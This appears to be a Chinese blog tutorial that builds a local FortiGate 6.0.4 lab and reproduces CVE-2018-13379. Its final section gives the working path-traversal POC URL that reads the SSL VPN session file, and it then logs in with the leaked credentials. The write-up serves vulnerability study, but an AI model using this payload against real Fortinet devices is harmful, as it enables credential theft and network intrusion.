CVE-2018-13379 环境搭建+漏洞复现

CVE-2018-13379 环境搭建+漏洞复现

在这里插入图片描述

在复现该漏洞时候,发现网上的文章很少有本地复现的,所以将该漏洞的复现过程和环境的搭建写成文章,方便自己温习,也方便大家参考。在环境配置过程中坑点较多,请仔细阅读。

文章中如有出现错误的地方,希望能够帮忙指出,谢谢大家。

一. 环境搭建

1.该漏洞影响的Fortigate版本为:

(FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 )

2.测试环境为:

Tested on: 6.0.4

3.FortiOS 6.0.4 环境下载地址:

点击下载
提取码为:srqc

4.修改环境配置:

(1)打开VM虚拟机依次选择—文件—打开—选择FortiGate-VM64.vapp.vmx。
CVE-2018-13379 环境搭建+漏洞复现_第1张图片
CVE-2018-13379 环境搭建+漏洞复现_第2张图片

(2)右键该虚拟机,将内存和Cpu,全部改为1,如果不进行修改将会出现LIcense过期的问题。

CVE-2018-13379 环境搭建+漏洞复现_第3张图片

CVE-2018-13379 环境搭建+漏洞复现_第4张图片

(3)开机—登录

Login:admin
Password:mima1234

CVE-2018-13379 环境搭建+漏洞复现_第5张图片
(4) 登录成功后进行虚拟机的配置。(在配置过程中通过Tab键可以进行命令的补全)

show system interface  // 显示当前配置
config system interface  // 进入配置模式
edit port1             // 配置port1口
set mode static        //设置为静态 
set ip [IP] 255.255.255.0    
/* 设置ip和掩码  eg:set ip 192.168.120.66 255.255.255.0
   配置该 IP 的目的是要通过本地来进行访问 不要直接复制我的ip */
end            // 退出配置模式

(5) 登录web界面,账号密码同上。

坑点:
访问时不要使用https访问,要使用http,否则将出现如下页面。
CVE-2018-13379 环境搭建+漏洞复现_第6张图片
CVE-2018-13379 环境搭建+漏洞复现_第7张图片

(6)登录成功后进行wan口的配置。依次点击Network—Interfaces,然后出现画面如下。
CVE-2018-13379 环境搭建+漏洞复现_第8张图片因为port2口是dhcp模式,所以会自动获取地址,这里看一下port2口有没有获取到IP地址,如果没有的话,通过刷新界面即可解决。

坑点:一定要记住port2的IP地址,因为等会要通过该链接来完成访问,其实本来这个SSL VPN 是需要去手动配置的,这里环境中给大家搭建好了,只需要刷新就可完成,具体的搭建过程,这里转载一篇不错的文章来给大家作为参考。
FortiGate SSL VPN 配置过程

(7)在刷新完成后,将虚拟机关闭,继续进行虚拟机的配置。

将内存和处理器全部设置回2,然后继续开机,然后进行web页面的访问。

坑点:
如果不进行配置的修改,该SSL VPN 隧道是无法访问的。

CVE-2018-13379 环境搭建+漏洞复现_第9张图片
(8)配置一台和 Wan口,即Port2口在同一网段的虚拟机,对该虚拟机的10443端口进行访问,为什么是10443端口,因为该SSL VPN 里面设置时,监听的端口为 10443。
在这里插入图片描述

CVE-2018-13379 环境搭建+漏洞复现_第10张图片
(9)用在同一网段的主机进行 SSL VPN的访问。

坑点:注意这次访问的时候必须使用https,不能使用http,因为是ssl隧道。
eg: https://192.168.220.134:10443/remote/login?lang=en
实际上只需要输入 https://192.168.220.134:10443 即可
CVE-2018-13379 环境搭建+漏洞复现_第11张图片

二. 漏洞复现

POC:
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/ssl_websession
验证必备:
ip(SSL VPN 隧道的ip,本文为WAN口)
port(SSL VPN 的监听端口,本文为10443,常见的还有8443等端口)
POC
验证方式:
https://IP+port+POC

CVE-2018-13379 环境搭建+漏洞复现_第12张图片

通过对该websession的查看
可知ssl 的一个账号密码为
login:test
Password:test
返回10443端口的登录界面,尝试通过泄露的账号密码登录 SSL VPN 隧道。

CVE-2018-13379 环境搭建+漏洞复现_第13张图片**成功登录**

你可能感兴趣的:(漏洞复现,网安,安全漏洞,网络安全,路由器)